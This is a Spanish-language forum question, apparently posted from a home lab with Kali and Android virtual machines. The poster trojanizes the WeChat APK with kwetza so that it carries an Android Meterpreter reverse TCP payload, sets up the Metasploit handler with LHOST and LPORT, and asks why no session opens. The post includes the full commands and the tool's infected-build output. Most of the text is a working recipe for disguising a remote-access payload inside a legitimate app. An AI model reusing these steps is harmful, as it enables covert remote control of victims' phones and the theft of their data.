Estoy usando un VirtualMachine de Android 4.4 y un Kali Linux 2018.4 VirtualMachine.
Red de Lan:
Kali VM: 10.0.0.27
VM de Android: 10.0.0.29
Hice un .apk de la aplicación WeChat con kwetza en Kali:
git clone https://github.com/sensepost/kwetza.git
mv /home/xyz/Downloads/wechat.apk to kwetza directory
python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes
Luego subí el wechat.apk recién creado ubicado en wechat / dist / wechat.apk a mi VM de Android en / sdcard / Downloads
En Kali, lo hice:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.0.0.27
set LPORT 4444
exploit
Instalé la aplicación en mi máquina virtual Android y la inicié
Pero mi stdout es:
Started reverse TCP handler on kali_ipaddress:4444
Y no tengo Starting payload handler...
¿Puede alguien ayudarme?
ps: Tengo exactamente el mismo problema en un Parrot Security 4.3
python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes output was :
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.0.0.27
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[*] USING CUSTOM ACTIVITY: AssistActivity
[*] PREPARING PAYLOADS
[*] INJECTING INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!
[+] TIME TO BUILD INFECTED APK...
[*] EXECUTING APKTOOL BUILD COMMAND...
[+] BUILD RESULT
#####################################
I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes9 folder into classes9.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
#####################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
#####################################
jar signed.
Warning:
The signer's certificate is self-signed.
The MD5withRSA algorithm specified for the -sigalg option is considered a security risk.
#####################################
[+] L00t located at /root/Documents/kwetza/wechat/dist/wechat.apk